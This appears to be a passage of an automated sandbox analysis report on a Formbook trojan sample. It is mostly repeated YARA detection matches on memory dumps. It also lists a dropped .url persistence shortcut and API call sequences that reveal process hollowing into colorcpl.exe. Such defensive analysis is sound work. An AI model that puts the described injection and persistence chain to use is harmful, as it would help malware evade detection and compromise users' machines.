          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: 0321423605241625.exe PID: 3140, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: colorcpl.exe PID: 3576, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: Mwqrxeuz.exe PID: 5528, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: raserver.exe PID: 5928, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\Public\Libraries\zuexrqwM.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
          Source: C:\Users\Public\Libraries\zuexrqwM.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021720F40_2_021720F4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE2EF71_2_06EE2EF7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E36E301_2_06E36E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDD6161_2_06EDD616
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE1FF11_2_06EE1FF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EEDFCE1_2_06EEDFCE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED44961_2_06ED4496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDD4661_2_06EDD466
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B4771_2_06E3B477
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2841F1_2_06E2841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2D5E01_2_06E2D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE25DD1_2_06EE25DD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E425811_2_06E42581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2D821_2_06ED2D82
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE1D551_2_06EE1D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E10D201_2_06E10D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE2D071_2_06EE2D07
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED4AEF1_2_06ED4AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE22AE1_2_06EE22AE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECFA2B1_2_06ECFA2B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B2361_2_06E3B236
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC23E31_2_06EC23E3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED03DA1_2_06ED03DA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4ABD81_2_06E4ABD8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDDBD21_2_06EDDBD2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4EBB01_2_06E4EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4138B1_2_06E4138B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3AB401_2_06E3AB40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EBCB4F1_2_06EBCB4F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE2B281_2_06EE2B28
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A3091_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE28EC1_2_06EE28EC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A01_2_06E420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE20A81_2_06EE20A8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B0901_2_06E2B090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EEE8241_2_06EEE824
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A8301_2_06E3A830
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED10021_2_06ED1002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E341201_2_06E34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1F9001_2_06E1F900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 06E1B150 appears 136 times
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: String function: 02174C24 appears 471 times
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: String function: 02176908 appears 32 times
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: String function: 021748A0 appears 60 times
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: String function: 02174A98 appears 136 times
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02189128 InetIsOffline,InetIsOffline,CopyFileA,WinExec,Sleep,OpenProcess,NtSuspendThread,InetIsOffline,ZwClose,InetIsOffline,InetIsOffline,ExitProcess,0_2_02189128
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02183690 LoadLibraryA,GetModuleHandleA,GetProcAddress,RtlMoveMemory,GetCurrentProcess,NtFlushVirtualMemory,FreeLibrary,0_2_02183690
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218779C InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualFree,VirtualAllocEx,GetProcAddress,FreeLibrary,WriteProcessMemory,NtProtectVirtualMemory,0_2_0218779C
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218C0D9 Sleep,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,Sleep,OpenProcess,NtSuspendThread,InetIsOffline,ZwClose,InetIsOffline,InetIsOffline,ExitProcess,0_2_0218C0D9
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02189128 InetIsOffline,InetIsOffline,CopyFileA,WinExec,Sleep,OpenProcess,NtSuspendThread,InetIsOffline,ZwClose,InetIsOffline,InetIsOffline,ExitProcess,0_2_02189128
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218368E LoadLibraryA,GetModuleHandleA,GetProcAddress,RtlMoveMemory,GetCurrentProcess,NtFlushVirtualMemory,FreeLibrary,0_2_0218368E
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218773C InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualFree,VirtualAllocEx,GetProcAddress,FreeLibrary,WriteProcessMemory,NtProtectVirtualMemory,0_2_0218773C
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02183990 InetIsOffline,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,GetProcAddress,FreeLibrary,NtProtectVirtualMemory,SetThreadContext,NtResumeThread,0_2_02183990
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218398E InetIsOffline,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,GetProcAddress,FreeLibrary,NtProtectVirtualMemory,SetThreadContext,NtResumeThread,0_2_0218398E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E596E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_06E596E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_06E59660
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59FE0 NtCreateMutant,LdrInitializeThunk,1_2_06E59FE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E597A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_06E597A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59780 NtMapViewOfSection,LdrInitializeThunk,1_2_06E59780
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59710 NtQueryInformationToken,LdrInitializeThunk,1_2_06E59710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E595D0 NtClose,LdrInitializeThunk,1_2_06E595D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59540 NtReadFile,LdrInitializeThunk,1_2_06E59540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59A50 NtCreateFile,LdrInitializeThunk,1_2_06E59A50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59A20 NtResumeThread,LdrInitializeThunk,1_2_06E59A20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_06E59A00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E598F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_06E598F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59860 NtQuerySystemInformation,LdrInitializeThunk,1_2_06E59860
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59840 NtDelayExecution,LdrInitializeThunk,1_2_06E59840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E599A0 NtCreateSection,LdrInitializeThunk,1_2_06E599A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_06E59910
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E596D0 NtCreateKey,1_2_06E596D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59670 NtQueryInformationProcess,1_2_06E59670
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59650 NtQueryValueKey,1_2_06E59650
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59610 NtEnumerateValueKey,1_2_06E59610
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59760 NtOpenProcess,1_2_06E59760
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5A770 NtOpenThread,1_2_06E5A770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59770 NtSetInformationFile,1_2_06E59770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59730 NtQueryVirtualMemory,1_2_06E59730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5A710 NtOpenProcessToken,1_2_06E5A710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E595F0 NtQueryInformationFile,1_2_06E595F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59560 NtWriteFile,1_2_06E59560
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59520 NtWaitForSingleObject,1_2_06E59520
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5AD30 NtSetContextThread,1_2_06E5AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59A80 NtOpenDirectoryObject,1_2_06E59A80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59A10 NtQuerySection,1_2_06E59A10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5A3B0 NtGetContextThread,1_2_06E5A3B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59B00 NtSetValueKey,1_2_06E59B00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E598A0 NtWriteVirtualMemory,1_2_06E598A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5B040 NtSuspendThread,1_2_06E5B040
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59820 NtEnumerateKey,1_2_06E59820
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E599D0 NtCreateProcessEx,1_2_06E599D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59950 NtQueueApcThread,1_2_06E59950
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess Stats: CPU usage > 98%
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
